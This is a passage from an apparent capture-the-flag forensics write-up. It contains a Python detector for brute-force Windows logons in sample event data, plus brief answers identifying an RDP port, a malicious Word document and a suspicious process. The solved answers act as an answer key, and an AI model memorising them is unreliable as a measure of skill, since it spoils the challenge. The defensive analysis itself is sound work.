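    {"TimeCreated": "2022-05-20T08:01:30", "EventID": 4625, "TargetUserName": "ming",  "IpAddress": "192.168.13.9"},
    {"TimeCreated": "2022-05-20T08:01:40", "EventID": 4625, "TargetUserName": "ming",  "IpAddress": "192.168.13.9"},
    {"TimeCreated": "2022-05-20T08:01:50", "EventID": 4625, "TargetUserName": "ming",  "IpAddress": "192.168.13.9"},
    {"TimeCreated": "2022-05-20T08:02:00", "EventID": 4624, "TargetUserName": "ming",  "IpAddress": "192.168.13.9"},
    {"TimeCreated": "2022-05-20T09:00:00", "EventID": 4625, "TargetUserName": "Guest", "IpAddress": "192.168.13.9"},
    # Five failures spread an hour apart: a typo-prone user, not a burst
    {"TimeCreated": "2022-05-20T10:00:00", "EventID": 4625, "TargetUserName": "miao",  "IpAddress": "192.168.13.7"},
    {"TimeCreated": "2022-05-20T11:00:00", "EventID": 4625, "TargetUserName": "miao",  "IpAddress": "192.168.13.7"},
    {"TimeCreated": "2022-05-20T12:00:00", "EventID": 4625, "TargetUserName": "miao",  "IpAddress": "192.168.13.7"},
    {"TimeCreated": "2022-05-20T13:00:00", "EventID": 4625, "TargetUserName": "miao",  "IpAddress": "192.168.13.7"},
    {"TimeCreated": "2022-05-20T14:00:00", "EventID": 4625, "TargetUserName": "miao",  "IpAddress": "192.168.13.7"},
]

FAILED_LOGON = 4625
SUCCESS_LOGON = 4624


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return {account: finding} for accounts with >= threshold failed logons
    inside any `window`, plus whether a successful logon followed the last failure."""
    failures = defaultdict(list)   # account -> [(time, source ip)]
    successes = defaultdict(list)  # account -> [time]
    for ev in events:
        user = ev["TargetUserName"].lower()   # Windows account names are case-insensitive
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == FAILED_LOGON:
            failures[user].append((ts, ev["IpAddress"]))
        elif ev["EventID"] == SUCCESS_LOGON:
            successes[user].append(ts)

    findings = {}
    for user, fails in failures.items():
        fails.sort()
        times = [t for t, _ in fails]
        burst, start = False, 0
        for end in range(len(times)):           # sliding window over sorted failures
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst = True
                break
        if not burst:
            continue
        last_fail = times[-1]
        findings[user] = {
            "failures": len(fails),
            "sources": sorted({ip for _, ip in fails}),
            "success_after": any(s >= last_fail for s in successes.get(user, [])),
        }
    return findings


if __name__ == "__main__":
    for user, finding in detect_bruteforce(SAMPLE_EVENTS).items():
        print(user, finding)
```

The success_after flag is the triage priority: a burst of 4625s followed by a 4624 from the same source means the guessing worked, which is the case the write-up's answer (Ming) describes.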
2
After trying all the IPs and likely ports in log1.pcap, it turned out to be 192.168.13.1:3389,
where 3389 is the Windows Remote Desktop port.
3
I did question 4 first and then traced back from it: found tior.exe and that WINWORD.EXE had opened it; submitted that, wrong.
Traced back again: the first file WINWORD.EXE opened was helper.doc.
Submitted that; success.
4
Opened it with Process Tree, expanded the process tree, found a suspicious process name, tried it and succeeded.
5
Added the suspicious file to include, and then found multiple files, among them information related to ID cards (身份证):
Submitted; success.